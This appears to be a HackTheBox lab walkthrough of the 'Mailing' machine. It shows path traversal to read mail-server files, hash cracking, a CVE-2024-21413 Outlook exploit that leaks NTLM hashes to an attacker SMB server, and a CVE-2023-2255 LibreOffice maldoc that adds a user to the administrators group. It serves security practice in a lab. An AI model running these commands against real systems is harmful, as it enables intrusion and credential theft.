HackTheBox | Mailing

In this walkthrough, I demonstrate how I obtained complete ownership of Mailing on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Easy Challenge
Owned Mailing from Hack The Box!
I have just owned machine Mailing from Hack The Box

Nmap Results

# Nmap 7.94SVN scan initiated Tue May  7 00:00:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.180.156
Nmap scan report for 10.129.180.156
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          hMailServer pop3d
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
587/tcp   open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
|_imap-capabilities: IMAP4rev1 SORT completed IMAP4 OK NAMESPACE RIGHTS=texkA0001 ACL CHILDREN CAPABILITY IDLE QUOTA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
65522/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-05-07T04:04:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May  7 00:05:05 2024 -- 1 IP address (1 host up) scanned in 267.31 seconds

We can see references to mailing.htb in the multiple protocol headers in the nmap scan, so let's go ahead and get that added to our /etc/hosts file.

echo '10.129.180.156        mailing.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/139,445

smbclient -N -L //10.129.180.156
No anonymous SMB share access



TCP/80

Server technology disclosure, but we already saw this in the nmap output
Just at first glance, the Download Instructions buttons could be interesting
I downloaded the instructions.pdf file
There is still metadata on the file that shows the Ruy from IT is the author



Testing for Path Traversal and File Inclusion

In Burp, select the download request and send to Repeater
Then, manually test file paths in the ?file= parameter
🚫
Remote File Inclusion (RFI) did not appear to work



Find the Configuration File for the Mail Server

The admin hash cracks easily
Not so for the user hash, but let's carry on



Downloading the hMailServer Database

curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Database/hMailServer.sdf' -o hMailServer.sdf
The database is encrypted with the password in the .ini file
GitHub - GitMirar/hMailDatabasePasswordDecrypter: Decrypts blowfish (w. static key) encrypted hMail database password.
Decrypts blowfish (w. static key) encrypted hMail database password. - GitMirar/hMailDatabasePasswordDecrypter

We can use this tool to crack the database hash

git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
cd hMailDatabasePasswordDecrypter
make
This is the cleartext database password



Reading the Database File

💡
You could greatly simplify this process by transferring the .sdf file to a Windows box and installing a tool on Windows to open the .sdf file. I am going to be using wine on my Kali box to open the file. It was a pain trying to find a binary that will work with wine due to various .NET requirements.
Installing Wine and Wi... | 0xBEN | Notes
Considerations I urge you to consider taking a snapshot of your Kali instance at its current state…

Install wine on your Kali box

For the purpose of reading the .sdf file, I'll be using this application: https://www.flyhoward.com/SDF_Viewer.aspx. It is a Windows binary, which is why we're using wine.

ℹ️
Just use the trial period to open the file and be done with it
wine ./SetupSDFviewer.msi

Run the installer

Next
Uncheck the box > Next > Complete the installation using the defaults
Launch the application
File > Open
Z:
Navigate to where you've stored your .sdf file
Enter the database password we cracked
hMailServer [sha256($s.$p) 256/256 AVX2 8x] -- does not crack with rockyou.txt



Interesting Info from the Database

hm_messages table has some interesting info
hm_servermessages table shows anti-virus might be enabled
hm_settings table has a SMTP relay hashed password (MD5)
GitHub - mvdnes/hm_decrypt: hMailServer Password Decrypter
hMailServer Password Decrypter. Contribute to mvdnes/hm_decrypt development by creating an account on GitHub.

I found this decryptor tool using a quick Google search

git clone https://github.com/mvdnes/hm_decrypt
cd hm_decrypt
# Found that xbuild will compile a CSharp .sln
# Via search with Bing Co-Pilot
xbuild
# xbuild output will show that the binaries are in bin/Debug
cd bin/Debug
Nice! Let's keep that in our pocket for now.



Reading the Server Logs

Logging - hMailServer - Free open source email server for Microsoft Windows
hMailServer - Free open source email server for Microsoft Windows

Using a combination of data found on Google and ChatGPT / Bing Co-Pilot, my understanding is that logs should be in C:\Program Files (x86)\hMailServer/Logs/hMailServer_{format}.log, where we substitute {format} for whichever logging type is being recorded.

I tried variations of smtp, pop3, and imap, but couldn't find anything. I did — however — find that awstats.log is enabled.

curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Logs/hMailServer_awstats.log' | awk -v FS=' ' '{print $3,$4}' | tr ' ', '\n' | sort -u



TCP/143

Testing IMAP Logins

hydra -I -f -V -L emails.txt -p 'homenetworkingadministrator' -c 1 imap://mailing.htb
hydra -I -f -V -L emails.txt -p 'Bm8zF3c5s7R9L1o2' -c 1 imap://mailing.htb



Mapping Mailboxes with Mutt

IMAP | 0xBEN | Notes
Create the Config File nano ./username-muttrc You should only need to change the username, passwor…

Administrator

nano admin-muttrc
set my_mailproto="imap"
set my_mailuser="administrator@mailing.htb"
set my_mailpass="homenetworkingadministrator"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F ./admin-muttrc
Logged in as administrator@mailing.htb
ℹ️
Currently, we're looking at the Inbox folder. To change to another folder, press the c key and then the ? to select a folder. Press q to quit out of mutt.
There was nothing in any of these folders



Maya

nano maya-muttrc
set my_mailproto="imap"
set my_mailuser="maya@mailing.htb"
set my_mailpass="Bm8zF3c5s7R9L1o2"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F maya-muttrc
Empty inbox
Lots of stuff in the Deleted Items folder
Use the arrow keys to navigate, press the Enter key to open an email
Press v to view attachments
Open the text/html attachment
CVE-2024-21413 PoC. ... interesting





Exploit

CVE-2024-21413

This really cuts to the point of this box being named Mailing, in that we're looking at sending a crafted email to a user. This crafted email — when viewed using the email client's HTML view — leads to a zero-click NTLM credential theft, as the file:/// link is parsed without any security restraints. When the file:/// link is followed, this will lead to a SMB connection to the attacker's system, using NTLM as the authentication mechanism.

💡
I'm sure it was the author's intention to demonstrate sending maya@mailing.htb an email in the instructions.pdf file as a foreshadowing of the initial foothold.
cve-2024-21413 site:github.com - Google Search
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Microsoft-Outlook-Remote-Code-Execution-Vulnerability - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
sudo impacket-smbserver -smb2support evil .

Start the SMB server to catch the NTLM authentication

git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username 'maya@mailing.htb' --password 'Bm8zF3c5s7R9L1o2' --sender 'maya@mailing.htb' --recipient 'maya@mailing.htb' --url '\\10.10.14.112\evil\evil.txt' --subject 'Hello, Maya'

Run the exploit

Save the hash to a file
Crack the hash



Test WinRM Access

evil-winrm -i mailing.htb -u Maya -p 'm4y4ngs4ri'

Test credentials against WinRM

We're in!





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Access denied to systeminfo    

Current User

User Name    SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002


GROUP INFORMATION
-----------------

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto        Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                  State
============================= ============================================ =======
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido             Enabled
SeUndockPrivilege             Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege           Cambiar la zona horaria                      Enabled    



Users and Groups

Local Users

Name               Enabled Description
----               ------- -----------
Administrador      False   Cuenta integrada para la administración del equipo o dominio
DefaultAccount     False   Cuenta de usuario administrada por el sistema.
Invitado           False   Cuenta integrada para el acceso como invitado al equipo o dominio
localadmin         True
maya               True
WDAGUtilityAccount False   Una cuenta de usuario que el sistema administra y usa para escenarios de Protección de aplicaciones de Windows Defender.    

Local Groups

Name
----
Administradores
Administradores de Hyper-V
Duplicadores
IIS_IUSRS
Invitados
Lectores del registro de eventos
Operadores criptográficos
Operadores de asistencia de control de acceso
Operadores de configuración de red
Operadores de copia de seguridad
Propietarios del dispositivo
Remote Management Users
System Managed Accounts Group
Usuarios
Usuarios avanzados
Usuarios COM distribuidos
Usuarios de escritorio remoto
Usuarios del monitor de sistema
Usuarios del registro de rendimiento    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::f897:ed7d:f35e:32a8
   Temporary IPv6 Address. . . . . . : dead:beef::d8e9:b8a4:3d01:3f62
   Link-local IPv6 Address . . . . . : fe80::c1bf:9c37:4c49:944f%14
   IPv4 Address. . . . . . . . . . . : 10.129.25.72
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%14
                                       10.129.0.1



Scheduled Tasks

Interesting Scheduled Tasks

Run As User:                          maya
TaskName:                             \Test
Task To Run:                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Users\localadmin\Documents\scripts\soffice.ps1 
    
Run As User:                          localadmin
TaskName:                             \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319
Task To Run:                          COM handler



Interesting Files

C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu

<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList"><node oor:name="file:///C:/Users/Public/Documents/exploit.odt" oor:op="replace"><prop oor:name="Title"
oor:op="fuse"><value>exploit</value></prop><prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop><prop oor:name="Password" oor:op="fuse"><value></value></prop><prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop><prop
oor:name="Thumbnail" oor:op="fuse"><value>iVBORw0KGgoAAAANSUhEUgAAAYwAAAIACAIAAAAewcwjAAAGnklEQVR4nO3UoQEAIAzAMMT+f3l8gKUiuaCqs7sHoGp+BwC8mBSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJ
AmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFp
JgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZF
JBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJ
pJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSY
FpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQ
ZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaS
QFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBa
SZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZ
SQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQNoFyY0K/qoBL3wAAAAASUVORK5CYII=</value></prop></node></item>
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList"><node oor:name="file:///C:/Users/maya/Documents/exploit.odt" oor:op="replace"><prop oor:name="Title"
oor:op="fuse"><value>exploit</value></prop><prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop><prop oor:name="Password" oor:op="fuse"><value></value></prop><prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop><prop
oor:name="Thumbnail" oor:op="fuse"><value>iVBORw0KGgoAAAANSUhEUgAAAYwAAAIACAIAAAAewcwjAAAGnklEQVR4nO3UoQEAIAzAMMT+f3l8gKUiuaCqs7sHoGp+BwC8mBSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJ
AmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFp
JgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZF
JBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJ
pJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSY
FpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQ
ZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaS
QFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBa
SZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZ
SQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQJpJAWkmBaSZFJBmUkCaSQFpJgWkmRSQZlJAmkkBaSYFpJkUkGZSQNoFyY0K/qoBL3wAAAAASUVORK5CYII=</value></prop></node></item>





Privilege Escalation

Lateral to localadmin

During the post-exploitation enumeration, a few things stick out to me at first glance:

  • C:\Important Documents
  • The scheduled task running soffice.ps1 out of C:\Users\localadmin

I was also hunting around in different directories searching for keywords such as password, passw, pass, etc. This is how I landed on the document at C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu which is pointing me towards the possibility of privilege escalation via malicious document.



Exploring the Maldoc Avenue

Obviously, we can't read the files in C:\Users\localadmin, so we can't be sure what the soffice.ps1 script is doing, but let's see if we can find any other information that might help.

# Recursively list the entire C:\ volume for files
# Filter on file names containing *soffice*
# Show only full paths
(Get-ChildItem 'C:\' -File -Recurse -Filter '*soffice*' -ErrorAction SilentlyContinue).FullName

C:\Program Files\LibreOffice\program\soffice.ps1

# Set the directory where the .odt files are located
$directory = "C:\Users\Public\Documents"

# Get all files with .odt extension in the specified directory
$files = Get-ChildItem -Path $directory -Filter *.odt

# Loop through each .odt file and open it
foreach ($file in $files) {
    Start-Process $file.FullName
}

Looking at the source code for C:\Program Files\LibreOffice\program\soffice.ps1, we can see that it will attempt to open any *.odt file in a specified directory; in this case, C:\Users\Public\Documents.

I suspect the C:\Users\localadmin\Documents\soffice.ps1 script is a modified version of the one discovered here. It probably reads from a different directory — I'm thinking the C:\Important Documents directory.

This information — coupled with what I found earlier showing references to file:///C:/Users/maya/Documents/exploit.odt makes me think that my hypothesis to pivot using a maldoc is correct.



Crafting the Maldoc

This was one of the lateral pivots in the HTB Office box as well, so I'll just be using my existing knowledge of the exploit from working on this box. The POC and CVE data are linked just below for more information. But in short, the exploit works due to the fact that in certain versions, LibreOffice will load links in crafted documents without user interaction (zero-click).

GitHub - elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre Office
CVE-2023-2255 Libre Office . Contribute to elweth-sec/CVE-2023-2255 development by creating an account on GitHub.
# Clone the repo
git clone https://github.com/elweth-sec/CVE-2023-2255
# Enter the directory
cd CVE-2023-2255
# Create the malicious .odt document
python3 CVE-2023-2255.py --cmd '//10.10.14.112/evil/evil.exe' --output pwn.odt
# Start a SMB server to catch the hash
sudo impacket-smbserver -smb2support evil .
We can use the evil-winrm built-in upload functionality
🎉 Nice! 🎉
⚠️
The hash does not appear to be crackable using rockyou.txt and we probably won't be able to relay the NetNTLMv2 hash back onto the target itself. So, let's create one more maldoc and finish the job.
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output pwn.odt

Note that the computer's localization is in Spanish!

Once the .odt file is deleted, you know the exploit has been run
Log out and log back in, note we're now in the Administrators group!



Flags

User

9784c83d0dbf02a9f237197737876625    

Root

3d664924b00f0be0e92f04db10ff3e76    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.